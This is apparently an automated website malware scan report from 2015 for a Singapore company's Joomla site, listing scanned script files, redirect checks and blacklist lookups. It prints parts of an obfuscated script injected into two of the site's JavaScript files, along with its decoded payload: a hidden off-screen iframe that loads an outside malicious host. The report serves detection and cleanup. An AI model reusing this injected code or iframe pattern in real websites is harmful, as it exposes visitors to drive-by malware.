Scanned pages/files
Request | Server response | Status |
http://vsc.com.sg/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 15:33:57 GMT Location: http://vsc.com.sg/main Server: Apache Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vsc.com.sg/main | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 15:33:59 GMT Location: http://vsc.com.sg/main/ Server: Apache Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vsc.com.sg/main/ | 200 OK Content-Length: 62438 Content-Type: text/html | clean |
http://vsc.com.sg/main/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://vsc.com.sg/main/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://vsc.com.sg/main/media/system/js/caption.js | 200 OK Content-Length: 2594 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeB ...[2152 bytes skipped]... Decoded script: <iframe src="http://tratramelly.nflix.co/gsatersyutriujf8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> | ||
http://vsc.com.sg/main/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://vsc.com.sg/main/plugins/system/rokbox/assets/js/rokbox.js | 200 OK Content-Length: 55369 Content-Type: application/javascript | clean |
http://vsc.com.sg/main/libraries/gantry/js/gantry-totop.js | 200 OK Content-Length: 378 Content-Type: application/javascript | clean |
http://vsc.com.sg/main/libraries/gantry/js/gantry-smartload.js | 200 OK Content-Length: 2815 Content-Type: application/javascript | clean |
http://vsc.com.sg/main/libraries/gantry/js/gantry-buildspans.js | 200 OK Content-Length: 698 Content-Type: application/javascript | clean |
http://vsc.com.sg/main/libraries/gantry/js/gantry-inputs.js | 200 OK Content-Length: 3880 Content-Type: application/javascript | clean |
http://vsc.com.sg/main/libraries/gantry/js/browser-engines.js | 200 OK Content-Length: 2662 Content-Type: application/javascript | clean |
http://vsc.com.sg/main/templates/rt_clarion/js/load-transition.js | 200 OK Content-Length: 2571 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire if (Browser.Engine.gecko19 || (Browser.Engine.trident && !Browser.Engine.trident7)){ if (body){ body.set('tween', {duration: 800, transition: 'quad:out'}); body.setStyles({'visibility': 'hidden', 'opacity': 0}); body.removeClass('rt-hidden').fade('in'); } return; } if (body) body.removeClass('rt-hidden').addClass('rt-visible'); }; window.addEvent('load', animation); })()); Decoded script: <iframe src="http://tratramelly.nflix.co/gsatersyutriujf8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://vsc.com.sg/main/modules/mod_roknavmenu/themes/fusion/js/fusion.js | 200 OK Content-Length: 26565 Content-Type: application/javascript | clean |
http://vsc.com.sg//ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js/ | 404 Not Found Content-Length: 326 Content-Type: text/html | clean |
http://vsc.com.sg/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vsc.com.sg
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Mar 2015 15:33:57 GMT
Location: http://vsc.com.sg/main
Server: Apache
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
GET / HTTP/1.1
Host: vsc.com.sg
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Mar 2015 15:33:57 GMT
Location: http://vsc.com.sg/main
Server: Apache
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vsc.com.sg
Referer: http://www.google.com/search?q=vsc.com.sg
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vsc.com.sg
Referer: http://www.google.com/search?q=vsc.com.sg
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vsc.com.sg
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vsc.com.sg/
Result: vsc.com.sg is not infected or malware details are not published yet.
Result: vsc.com.sg is not infected or malware details are not published yet.